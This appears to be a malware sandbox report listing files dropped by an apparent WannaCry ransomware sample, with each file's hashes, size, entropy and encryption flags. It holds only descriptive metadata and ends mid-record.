                                SHA-256:13879EF8061F082800964D61BC7A0B26CCF390C937FFF6C5ABAEC02E33BB6021
                                SHA-512:41872C56CE8C4AB699DD10E4E58A486FCA84B460B3BCD142331B2305DB0F1343B292AAA7DFA59A986459B078FB808B55652F19FA6F78BDB5BE5A4843581F8F72
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):75576
                                Entropy (8bit):7.997674457313432
                                Encrypted:true
                                SSDEEP:1536:ARpRSn8OyqPVw2duo8AkmXTNXAa4U0nlCeG9ZrgV0or98+izou6SzH:AdSn8OIo8AkmXTNXBeCDFgVK+ao0
                                MD5:3A456BD64DA1F7071F48F5D73E676B3B
                                SHA1:214BFB97B62A49DC9B6C4CE8683DAFFCB17B75E6
                                SHA-256:76A5DB0BB71A21E6A94F305CBA31914F8B38C2657DD0A9CB84354DA563CD8814
                                SHA-512:89B87B410B0CAC3B79530814677B26CCCDB0C07C97CC38A36972AEE0D0DD82C1893412B64131ED9DA0853D909E3E55A2C7B1A0F5FD9A9A5B11279804C75EC9B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):75352
                                Entropy (8bit):7.997659367482623
                                Encrypted:true
                                SSDEEP:1536:QLEGzl9hApf7eW/z0r9GwqDWukMKWZZltOeXJyspgm:QpzJE7f/z0Giu9KW/bZHph
                                MD5:F0DF2193ACD4B96B056434D1A3A71B1B
                                SHA1:9977D67865AB720C85D9DFA0EE3B78CED9F4A5FC
                                SHA-256:8318E7D38AD744906B6B7079A90CA5BF3974F0DC9B1F92C53C305AB21C917A8C
                                SHA-512:7C787CA97D9DE5F55A07675580484647EB609B800C70E2BC805322721A94B1D9D00DC97280F3F3BE7B34A49A6F10C4C4A9226154B83DC87BC814BA909744C952
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.259574592736034
                                Encrypted:false
                                SSDEEP:6:bkECwce1LOlMmEovlklYqWyDpjzHMHNt7qXp28DHkdV2DAVC1LJgSn:bkECGL0zEo9k+q3jbOi52eSV2+C1iS
                                MD5:7A41FD7E66D85A47BF4A6312DB88E0A8
                                SHA1:AE609F098B2C075B1B1DC0DE95EBE833F62CAE2A
                                SHA-256:DBFE3D8895639732FA9A1F66E2E3E94AABF4A6C9EA9F56AA2BCB73A0BAE282CE
                                SHA-512:E70925331E89890B6ABAD57808009CF37FC1572D7EE07797CD9EACFF108B4D0F5774ADD9EF8ED7767CBAFBF3E370B07A1A83E50DF81273174D0797FBF689F37A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999822199189562
                                Encrypted:true
                                SSDEEP:24576:ijcZ3vborrisEuO/w2WwzgAuVNjFTaF7X7RswMA:acZ3DoPisRAD8NohCwP
                                MD5:54393ECF0C5BAA85D73001B86E8E9CAC
                                SHA1:730E572B483F20A9BCF5AB046F430EF82D43DE87
                                SHA-256:A51A198EA62012578CB380DE88690DB2227951DCAF71467E6F20D4035796CD42
                                SHA-512:C842C0B73875A3B6A3F58C690325FE7A5E323DD8CEA58D0F0E3D4D4B11320FFAECAF4FEAF58FC8CC7EF52ED7EE51102D7129CE2DBFD34E82CB5176DD66B00839
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.237674834414331
                                Encrypted:false
                                SSDEEP:6:bkEmbcts076z2kz4tmizP7G5o2dsswsAklzh4IFJX1/92ghGjzw9XVB5:bkE/g2kz4Hy59Z64zh4IFb12OGjzUz5
                                MD5:EA212FC7770F38122D1F57FACB87701B
                                SHA1:21C46EACBBE831710F2F90CB10E30FE3268C43F0
                                SHA-256:1FCBF64560DE22AF6B32ACE791064400DD802CCD51D2D390752AAADD28679C95
                                SHA-512:2A9FFD9040DF9EFDDD57FE7809A012A0F22D2BE7C9326B4F19C7C04CDED121B454C6565064A4FA7E812ED7810666DB91A572E8BE2563B855AC30C916F18653ED
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5243160
                                Entropy (8bit):7.99996594205298
                                Encrypted:true
                                SSDEEP:98304:O2GF4diSxNdO2zsDUXRZF36tbOo7xmLjbWZkpsbjXFMVY2sI9RfxknQn:LfKDUXRZMOLPyv+eU9JOns
                                MD5:79E0FACC2224C4E21EB364295C84B680
                                SHA1:762E989F09E3AE592BA17F7C7124CBA62E8C76A6
                                SHA-256:EE23B8F170227B251779364379EAC5BEEE1216B0DFB1684376034B42ACD3F5B6
                                SHA-512:5CECB5BB8D892E557ED7996A214735644A7E28C26060820E7341F8F5186D58453F42DB433229524C997BF1B937FF2510F803FE795DED406EF6764417A5F21F0A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.15442429450716
                                Encrypted:false
                                SSDEEP:6:bkEIAzAOfe03x1rAHpzJ9GJXlewlk2PCWXrOS2moj2TBnUh/:bkEIAzAO0p19GJXleUk27OSzKoW
                                MD5:FB28474E0EA86E7F8848916D3501BB19
                                SHA1:BBE8E7DCE3F3276566DEB8AC4756AD42C58D2137
                                SHA-256:F74B143CD89909F0A1701F00A2D1B6EEADC093B2542D8E8BD5C0099301886FF6
                                SHA-512:493224CB7B5962AE29163F0F80C5DC6955B94A23560076DE44896A89B60561F90425F60F94297FC6047B415152AA4158C1D4EDAE11275B4CA261DCEFDEDD98BC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2097432
                                Entropy (8bit):7.99990959246282
                                Encrypted:true
                                SSDEEP:49152:K1oJvRfb7nrWS+XIzHoS3r0CduPLJSS7j:KIRX+Yzo40CduzJbv
                                MD5:3CA01E46E36689E39B77D59D86099EE9
                                SHA1:8232EE4D5E9524EA5E241E48146333F094DFCC36
                                SHA-256:5B7618F5B1C23D2AAD6C1D411ACD94C1A31963B73EC43ED9FECACCA12400C1D9
                                SHA-512:CBF2F5F580DB1C157E11C45D706610F841EBB6EBF07CA6B6168B04F07FDCDF849F26A1D14B3DAD28BFBA2D125F10E9E5CCB4D4095050D98FAAE6ED51B678E502
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3146008
                                Entropy (8bit):7.999933490439828
                                Encrypted:true
                                SSDEEP:49152:FkEAxFJSkTicodbR7VbelyV32LcQebqYyKkDgH6sJvp36PbZmnF4oJedQ22or6nv:F+wYic14VGLBeOFgdRl4oJed/2oo
                                MD5:319CA8623BEAAF68C94BE735870BB9BB
                                SHA1:4392F7FDA8968B41EE11FB2209CD14E56C067904
                                SHA-256:6CE3C324A0C08B1A2153104C766F31FFE6DEA9B1A6A08B50F27D6B86B4E73CEF
                                SHA-512:1FFB52DE49C7B9B43CD2564606F0A0C3B27DF050F1F2AAE4AA8F22937E133D0919D9701BF1E159AB7D9B1E496981C0ADF5AA4938A1BFD3BF571880718D307581
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.189867522345476
                                Encrypted:false
                                SSDEEP:6:bkExKyNDcZBQhF049IiI592+HTUpq2ov1mcWAckO55G0lYEKR:bkE1N4ZKhF0SIiK92+HT48voACrYb
                                MD5:CBBB4A055A50015486B4E78FD8EDCEFC
                                SHA1:28EADF9C094D71339F724ABC5E77704C568E957A
                                SHA-256:CD50F5577391D15F44CE77B144AF9E8F03130CF91D9C2E881FF6EA5DC6CD9920
                                SHA-512:865389B3DF86EE83DA18333F23B34E5E5D94AC742699E2F1F0AAC638F00A0F1E1C2FB00A2A4A33D1347360DDC2C2B068DEEE5469F1673066B8D4F9191DAD48AC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.206614739699949
                                Encrypted:false
                                SSDEEP:6:bkEsvsEdv2lrtYarAuRIC40SM5Yv9PkPa2D0K+GFveara1:bkETEduBbAuRy0FO98C2v+Omam1
                                MD5:F86AC348C86C3ADD154EE6E63F64B549
                                SHA1:60D9203CC86414EAAC7BB2B37900C1C62084F375
                                SHA-256:6E3820B9081B134788FC1724DE43959E656456933C12D9E560478F5A3D601753
                                SHA-512:3971B094AA13D2401B197D5193B3B51A28854EE8CE87BBD486F23568DB99A8351992D7EECA44F322BB215D869FB79D5DDAE6520C1F34B117621BB1A3C01A2765
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.150896541029274
                                Encrypted:false
                                SSDEEP:6:bkEjO4xCoR+SL3YR3jOYxDBXtkgeuAUDI15bOq/S6+mk2G/9oe4Q8wR:bkEjO4xCoR+C3mjVxlXttbDIvYd2aoV4
                                MD5:FF3986338045ACB4CBD3CCDE8BC0BA28
                                SHA1:4955AD1CCECA6C90C2D85384923E440FA367C2C3
                                SHA-256:9F3E25B0410A7E6FE3D7DE54CEB4AC44C598EEF070CB4D7BDA41661A1E1DE7E2
                                SHA-512:A2E6839D0071DF87CAD042EE24550C9B630C64A44DBD8A4A383018E6EFE170F74BB7310C7BC78E10F6DD68E0A5D232AFE8C953BF72A501D98F6851B0E1E0E65C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.216427429019806
                                Encrypted:false
                                SSDEEP:6:bkEBjwUfLkY8ruGuK9j6TuRXoXB1QMMg8VnY9vMgg6C8cKZGihjiKjgv:bkEhrkY8D99j6s4fGnYvMgLC8cKHBpsv
                                MD5:1B6AA22E35D5F2356CDEFE91B1FBB033
                                SHA1:4D26F8B6B6E54CC081E0B230C315AA953ADCD963
                                SHA-256:7A7CC473CCD0EFFCAFBF4904933BD93B95A6B4FA262B763A3734BC72B9ACEC54
                                SHA-512:46D78F3CDEF6726CCFEB0293FFFAF4F0CF11A7DF83478BF4587A921633FCBC8C196DA2D9516050B1809CE1AD884DB0F919102B18C228EF59BEA718109879AE55
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58600
                                Entropy (8bit):7.997065787476011
                                Encrypted:true
                                SSDEEP:1536:BA1M4qpS8/WL6E4/wIjUKAuElilFIqpsJ9ZxsdFMk9i:u1kpS8OL6E44IYDkE9/sfM8i
                                MD5:5537FB6E33AE5A8C33A6976B445DC7A0
                                SHA1:D5DE05D1135CC337086C27C85FA40371465926AD
                                SHA-256:8DAA084A671F3F311630CD8562E622B17CC2A518F994512B5357654D3A9E8D26
                                SHA-512:72458F3543DB6726E0E3388C866905DF773527D879560A656081A9A58D3BBB21429849915414037198A305CDF5056CDF18181CEBE971A11D91D334F78742CB3B
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.203832619697974
                                Encrypted:false
                                SSDEEP:6:bkEM1zi/KkiHo/Uf92A0pMrLQqa57rLo7qipSadBGhCbB+xGA/:bkEA8V/M2AQMrwXjipdLBaX/
                                MD5:FBE8FC050E6156270C059B94BAEA2E33
                                SHA1:F34F2DD07D75F81ADCB4C4804979B038DEB1AE0A
                                SHA-256:88026380874E811707B8420FFDE318127BAFF52BCEB1165C4F3E6015585E1579
                                SHA-512:B980842BA033D23B4734675D5FF213C2B014C0CB761C2F7FC852DAA15D27DF74A5D1A306218860211D437F52CB966EC716988EB223CC044FA35F9C594C58603F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.288358086298042
                                Encrypted:false
                                SSDEEP:6:bkEbcTAmI5SId6m0vTg+5p5tb3JFs53LbiRd6tgWPUXZqyInzzsf/rHEYIWn:bkEgTTI5SIdX0vM+DzLspiTXUyInC/bx
                                MD5:9BDB7601CF10257F391D9CD37F1BB546
                                SHA1:5DD5E785F206394DD7B6C21078B044C1D24F1DD9
                                SHA-256:2D38329EB4892F18D1FE241E3613C94432C817F36D8F5AEE6B1241085C8418E9
                                SHA-512:DD922B63CD9BF93E9D38DA2C384106BCB89C156A5C7F35B04F6C87974E7D45B27F3F705794D7979F1E1B02D32F70F6F4B0F4588EDC67AB06DA9335E8BE6BCEFB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.162405784877906
                                Encrypted:false
                                SSDEEP:6:bkEP4BpZjFCG24miYkmBMheMj3NP9cB94d6N9P7rKmV9/FNty:bkEPYr24mHkuM/j9Pn6db/FNty
                                MD5:42279516F2AC09504202316140EFFB8E
                                SHA1:4380A355F3C34B4E66D015A96A56A1E18C899CA1
                                SHA-256:BCC7252653EACF3EE2A3EB1B3941BB52647181D7C0862AB004DCA7980B297CD1
                                SHA-512:2199AD83E8B61B193EC5E76A81AC85A96E3E42B6E497604A22D6ABC8F533C9D63C1D203AC540C000FE0D44093EE9621B7EA37743A37A1651FEAD0596F8FDD187
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.0749597806960445
                                Encrypted:false
                                SSDEEP:6:bkEvVu14fX88zM4ePH+0Cekj0BH7M7CegiL8QNdIUL+ypeFMK1n:bkEv014/PgC0CekQ7BegxQP+zWK1n
                                MD5:6DBF616E2EC4BA08F36EC5CD3C3DA899
                                SHA1:D9FC06ACD7D15E3D28757715363E068CA76B3431
                                SHA-256:69FFA122972B2ADE67C724D536DDF3ADDD8B4B7947B306677E3060B751392F10
                                SHA-512:9DBAB8B13EA45FBD48DD9C0E8EC53522A540DA34FA1AB1A30F9B79CCE3AA7E1C440D1EC0ADF12DD10E5C08F4528BDBB78E1D2F7CA3CEAF6DB7328C0B17B4D52A
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999794843985097
                                Encrypted:true
                                SSDEEP:24576:Ij+b2R3MMJ9asrYp7zacAbXgQ08nv13isRC1De:IcP2trYpfacAVv1q1a
                                MD5:E04923575480F6A6A9E6400F8E2BDA03
                                SHA1:95FD7D33165D5ACB195F0FC2F972F8D17F372CC2
                                SHA-256:F20F3C08045D7D337B52756873C20F82587F35D988F4FF206DFC9A93974629C8
                                SHA-512:B4272002465117A1A83689F32F28F7956EDCBCA914C5A5D02CE09F17B1006E567885337D79524FCF902D9F65DAF256378FCDB4E445612BF9B1877F23E25B6C41
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.214702797864241
                                Encrypted:false
                                SSDEEP:6:bkEReywdJDMLb50W7mqOicdlt+ljj+/WJ5bEquw+lTnLjxPQilFcE:bkEws50V1nl49r3bEqcZmilFN
                                MD5:2733F8FF40B6AD97E9E3099088F09716
                                SHA1:A782348CF89B9798E4D70682DA5C06BC61C8F62B
                                SHA-256:9AC40AA544183EC0D6ED87403E16E3F48311C111BA8BCAF28AB4ED2C76CF6AC0
                                SHA-512:BEBF350C9A182FC682A4B23AF1B3435F8086DD27C7DE861DECC4E079708C6E87894B810A41F8E36B8D66FF6E7E3318A6158AAFCBB7EDA16D1146A075F4FE39F7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.9998378899815314
                                Encrypted:true
                                SSDEEP:24576:WrfZWD34n1YGOdFPsi7uHiVVOyLlXkQzjcrvh3+IMhFLo:8RWb41cFP3WiL5XkQzjLIM3s
                                MD5:C1E3D0671C6D5DE14592A349E1092F48
                                SHA1:84827112C4CC23DA886507AE490D5BDE9AEED19D
                                SHA-256:311941878ECEC19701F5DD7939E931A0D5D21B8A5AB8A262091120E9C0AA472C
                                SHA-512:7647A75F98430BC47651EC778066BA9EDF0E0059C781EA65F3F8BDE6477A414D09C94424AE1A0388FDFC44469DC31283DF1FA8B09DA48AAAABD923DA1EB5701D
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.175795857199445
                                Encrypted:false
                                SSDEEP:6:bkEDY6HGO1UysP9XrboNrml4NJPfmWVQE7yTplzIRTnYmFh4SCy6vN1SN:bkEk6HCysVboNrmiNJPfZQE7y7IZnzY4
                                MD5:A2D8F16E79428CA843B0860C1B424995
                                SHA1:31EC46DB47EFD1505163A109CF50B25F03C68C2D
                                SHA-256:49BAF931C4AFF475CAFA05B60E820CE74D9A94C9FDC4E1C2CDDB61BEE248CFD4
                                SHA-512:3C5E4D4A3A24BCA6DFB8BA7E7C7CFFA5CFF0D0517EA584377497D6AD0202BA78CF14CB39FD102922A5D604469071678E8FDEE65C2DF807AC6E8B996622711BF9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999836971607662
                                Encrypted:true
                                SSDEEP:24576:aaF+ZRoc0y86PhEX6ea/yS/4bvYVGO9YxvzRNOEmXtRPs/IIvU:aaF+Ac0qm5a/ylbvnO4OJtRhIM
                                MD5:FD3AEF5E0383144701F339C42C9E7ECB
                                SHA1:60E4EF97236AE68CECAAA1DB3EF2DB88665F327C
                                SHA-256:74BBCD55C60728346D2DBF3B39617F7C29843033F91DD6DF48E24F6218DB5D83
                                SHA-512:A36DDC9F98084FD6092034538D11BB3F39A413CC735627BD405965C3C743E25C448475182C3290F5DA29D09832656096F9F003312E166FA16B475440B14CEC4C
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999815125338464
                                Encrypted:true
                                SSDEEP:24576:jHFzh0FkepI/RbPfjkiHjjIgCb9LTr35GjDC2a4l3uzrb:jHBh0Weppr35mG2akqf
                                MD5:8C67419E9319AEB3388915F2407ECE4F
                                SHA1:18E99AA7E21E78AB9F8CCE005047E9B322FC78CE
                                SHA-256:B526777DD3AFC8A048E63A01BDAB98B1AF0468EC0E62544265C21A722A0DB1C8
                                SHA-512:E403F9C9DE9109F1BC11FBC52F40310296D57DC1FCD8C262761A2613D5A1A3E701FD83320FBC3CD279B53AE2A613EFF2BAB1440081CECEBA6D1C1D242505F9E4
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.2429995253513875
                                Encrypted:false
                                SSDEEP:6:bkEFEzAX8Outo1sF0LNof+nP2O5vDXgtYFT07yfbr4Fhpz0Apx0MjLKSn:bkE4AMOQIsF059T5ktYp0ufP4F7wcjKS
                                MD5:7CFAAA0B03C8B4B91CFD54201835FA9D
                                SHA1:7C128EA4A298669D0E29BD4A4269DABD22F0C327
                                SHA-256:5DCAF98B624B6BD06B9D6476617B58AE8DF408FEEB4D30E01F8B4EE15CC8AB7F
                                SHA-512:D5FA4DF572245BE94E7695923EF78AE96C5631ADB3E348C5785A16777F79A4C89312B7969C0ED5CCEA57A3B847D32E6C9EA893F0AF00850DBADBE6407BE043D4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194584
                                Entropy (8bit):7.99995005316091
                                Encrypted:true
                                SSDEEP:98304:8Vu1A5Q7NtMTwkxtsd9mg/EShbVjLMO0g5GvWEw77A:OYMQ8wkxts/9/j11APxWP77A
                                MD5:CB6402DDEBBBE66BC70BCEBDA081C380
                                SHA1:06E7D0BD459411B2EA6B58364AEC2CC94690F291
                                SHA-256:3359E14A20D11683A45E4C0D598719F432661033A0D29DBCD0DEC2C30A7F0D74
                                SHA-512:6B0E986A86CE74A8AFC8B00F71663DF73AE0583ABBEB78D16561D5ADAFCF8701DF35C6ECF1233AC9DA3722886F91D44F62AA5E0FCAF0C025BED6C001E26A43A6
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.218568222481324
                                Encrypted:false
                                SSDEEP:6:bkEsJexLWD6Gg2UuG9/OUhyGi6MaNTh5oC2IXcKk6nSPIuVKLn:bkEIugNsFg6F0Qw6kIuVU
                                MD5:B42A1F3F838E69A4C075D9D966B0D85C
                                SHA1:468106F961607FDDEDBA91BD8F60FBFB2E91D4F7
                                SHA-256:AB293573601111DB3C7EDEFBCA88B4EA8A1C8E9E66BAE692E8052802B47F98A1
                                SHA-512:D88D3E5093CB2FC470A3083C8170FD40BECA6E5D635117F20E376A423DA2A62A53F86DD869108F564FB414E7ABEEC17018C626BD4C36C3B413A54774C040BE0D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.1753692077709355
                                Encrypted:false
                                SSDEEP:6:bkEZU9nEzXl4h5NcFlkCB84MKGQxlPkNQ5+3YgT/UdllCJ/iVAc:bkEeqih6QdQrkQ5+36nlsaVn
                                MD5:A8DEF8735C738ECB5C26464BCD9CF762
                                SHA1:0251C37DE6F2FEC832BAFAF3344EAEF9FC01C7A9
                                SHA-256:2A4D51BB76B935139C100B6E6BC7B1F88AD2AEF3A2F1B7125D4F9FE3DFFC7F28
                                SHA-512:B45F1E617B8DE8677E1856B1826E7DC8DC58E31027B06506011E59C70BDED52907E86D1C43136D03C75B8E0F7FFC12B15B24173C4A6D5E1ABBA45C4364524630
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29512
                                Entropy (8bit):7.993037904662244
                                Encrypted:true
                                SSDEEP:768:yjt6TWelWmrwzpeJ14Ca5isSx9YbmsFkGGPvvcXQ8PMA:yjt458mweJ1zaQ9Vj1vv+T
                                MD5:EA5E6A2C036F2808991E37745F2980F6
                                SHA1:AF7559A6D24B2A66FE77020A275A7864FCE9C316
                                SHA-256:689F032E6090CBE24E6B38549A0B0E1C8DA953F074F43210A13DCDCC255B75EF
                                SHA-512:562330A652C5C4CEEE9935AA5D2AC9F7C7BF29D952719A55DD07C3716F93B17A1A8C5BB175FDF4D72E0CCE560F6C53987F3F9BA4DDAC3A93167B4ECFBBA2452F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.147031645512108
                                Encrypted:false
                                SSDEEP:6:bkEneLeoPxFhi+XD5a0AgL45T0o8JxVC1XpaK2T:bkEeRPpD5a5gUpYGXar
                                MD5:73676442458C5C9D001DEBD815764BD6
                                SHA1:41E26E31CED954F19720941D31E6DF152CCE8A1E
                                SHA-256:EBD6964D0D07C80DCEDA84983918ADB59180B08C1D048375A2FEBAEAD4A7ADC0
                                SHA-512:020E149D40977AA282CC05BE274DB150DC7866E248753BA909B8ADB80DF5A3F35F00E76C40EB70FE2EF3FC43FCBE0CFC723E627096F202E691350A5BFDF12842
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.206804100919654
                                Encrypted:false
                                SSDEEP:6:bkESkLsqcn+zXnZ25VK7Lc/ME7VXgNq7VgKwle73DhylaeGwvha:bkErLsqc+zJ2TgA/hXP7RwlerDUlISa
                                MD5:FDF612F57959D35D8CBAC4D17A3199C5
                                SHA1:F39293708DB1A2F348F8D5EE3E6813601512B5F1
                                SHA-256:AAF739894BE370AC0202C8CED805F6B54640E6ACCCDD9D5B5185704F11870A50
                                SHA-512:0F939694F798CA153D872C595FC5B4BA74A1F837B61E4B60D6693AFDFDFEB948FA6DB96449E353B2C5F82A1D999DEC78C64CFC08FF518DB7A9599260096D6EBA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.205849255861729
                                Encrypted:false
                                SSDEEP:6:bkEq/gSOG+TKsCIHaseBSx07ITpplmgNhUpjipIUV5v/RqBLJif3nUjFXsgn:bkEOj+G66O1jXgpmp9V5sJWU58gn
                                MD5:274E7EA2939887D4DE4C064C002CD9C9
                                SHA1:E0D3156898F7E6266ABCE792F86F87F6214B0DBB
                                SHA-256:F8E4EFC7D090A98385C2C433493A7D736FB5F4B9D5CD229BA0190D8997107E28
                                SHA-512:2C5F33EA897A3B1D857680C5F15828FD0AEC9E17B7A9B54A0546937DF2FD1103B38D3A33DD6761D5BB7A572E0B23FCCEA42224C2EFC3D803C7AE7575738BB49C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999809340582305
                                Encrypted:true
                                SSDEEP:24576:zcup/IMPriQJTxk6oYClaz9XKdPIMlGbNLal1Di/O:oupHHfglaz58PIaAWfAO
                                MD5:8F29DEB26F600039472C1B4222D402DF
                                SHA1:EDCB176574DDA2B3636F66AABA15EDAA861744DA
                                SHA-256:3A3620378F032D766B8C675AD6AD5DFB0958284B4631412D0C964FEB45928E49
                                SHA-512:6A17CE97B849CE70A81E62967D2C3F5352BB73902B107DA135E299F555AD62BD62C9AB25D1D7777BE6B83C28F927021EB523CC61E9473079B4938BE62EEFFCB3
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6360
                                Entropy (8bit):7.968269376079092
                                Encrypted:false
                                SSDEEP:96:oZyW/DVZWXea/zkZWQyoxIsdDGdzcb88z4KxjZG2DMvTvDuOb7Ei/5HCOH7IoUSs:8NUOSkEiIsdDGlr8s+Q2W/Hx1EoUS6F
                                MD5:CD8FED9BA729C7CCFC1D743C315EA366
                                SHA1:AF263276907B15E9745629662863620AD713870B
                                SHA-256:5ECEC5756E8F250AD2152DBA89C767332162BABA7DFB288006B715151432A6FC
                                SHA-512:CB32C31F2E2868F444A94AE8F29C7CC882566EA71B4A54B7B048E754AD9C1A7014092E0681DA6C25B3088D72C3819F346327B66CAC23C345AB2D14748E377CFF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6760
                                Entropy (8bit):7.9723794854002925
                                Encrypted:false
                                SSDEEP:96:o5bbu2x780E+CT43jDQtYOE749bNr0P62CrfSlzUlqociJJP6hAOFnRlqdEglVVT:odxCXsMYvMPpbizUlf36hlqKSWMds0x
                                MD5:F3EECA1EE5BA232BABF378A5597FFE9D
                                SHA1:46DCE39A41D5FE252B5988D07DAFB90232FA8197
                                SHA-256:204CA60EEA6AAFC05E3A248BB7DC5DADE8B29E76025C3E22085ED7E346232917
                                SHA-512:02FCF223D52FE7EBF47160CD7E21EC903168F02E2144229F76D77CC8474F9B884D0E34F123B96AFB2343D7BCF31EDB4C01DDDE58A8D8281E8FCB8884AA964500
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23448
                                Entropy (8bit):7.992150082275762
                                Encrypted:true
                                SSDEEP:384:idMHwikSun8WPEf4NwdEqSzoQ47VSHG3CBihxvwcslDPWaAU71O3BXD:ieHvB3fDdEnzjQr3CIw9PjAQOhD
                                MD5:72C10AD897E8F0BCDE61B8CDBE7DC822
                                SHA1:72295A31E0FD456680DF2B673A90FBD9FEF802E3
                                SHA-256:F8AAFAF70BBA39780E65C8992DE5D26CE6692E3E78D93921857A95E9B4CFCC07
